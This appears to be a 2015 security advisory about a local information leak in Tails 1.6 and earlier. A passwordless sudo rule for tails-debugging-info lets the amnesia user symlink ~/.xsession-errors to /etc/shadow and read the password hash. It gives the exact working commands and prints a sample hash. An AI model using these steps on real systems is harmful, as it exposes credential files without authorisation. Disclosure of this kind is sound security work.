Tails <= 1.6 tails-debugging-info information leak by cenobyte 2015
                        <vincitamorpatriae@gmail.com>

On Tails <= 1.6 it is possible to show the contents of /etc/shadow within the
context of the amnesia user when a password is set for that user.

The amnesia user can execute tails-debugging-info as root without a password
using sudo (/etc/sudoers.d/zzz_tails-debugging-info):
amnesia   ALL = NOPASSWD: /usr/local/sbin/tails-debugging-info ""

Note: Other commands executed as root using sudo which are not listed in the
sudoers files require a password.

There's a function in tails-debugging-info named debug_file() which serves as a
wrapper around cat:
debug_file() {
    echo
    echo "===== content of $1 ====="
    cat "$1"
}

debug_file() is called in tails-debugging-info with the following parameter: 
debug_file "/home/amnesia/.xsession-errors"

The .xsession-errors file is owned by the amnesia user and can be deleted and
replaced with a symlink to /etc/shadow:
amnesia@amnesia:~$ rm ~/.xsession-errors
amnesia@amnesia:~$ ln -s /etc/shadow ~/.xsession-errors

Running sudo tails-debugging-info now displays the password hash of the amnesia
user:
amnesia@amnesia:~$ sudo tails-debugging-info 2>/dev/null | grep ^amnesia
amnesia:$6$r0jt1v9E$UOrWbJ70qAH/sjaKfjmCMvkXZ19bqC2ieQ2UvYk0HKwVvgxuZFtyIwjoLfgH
AwrZVM3a0NTEkcsQY1hn/Uq2S0:16710:0:99999:7:::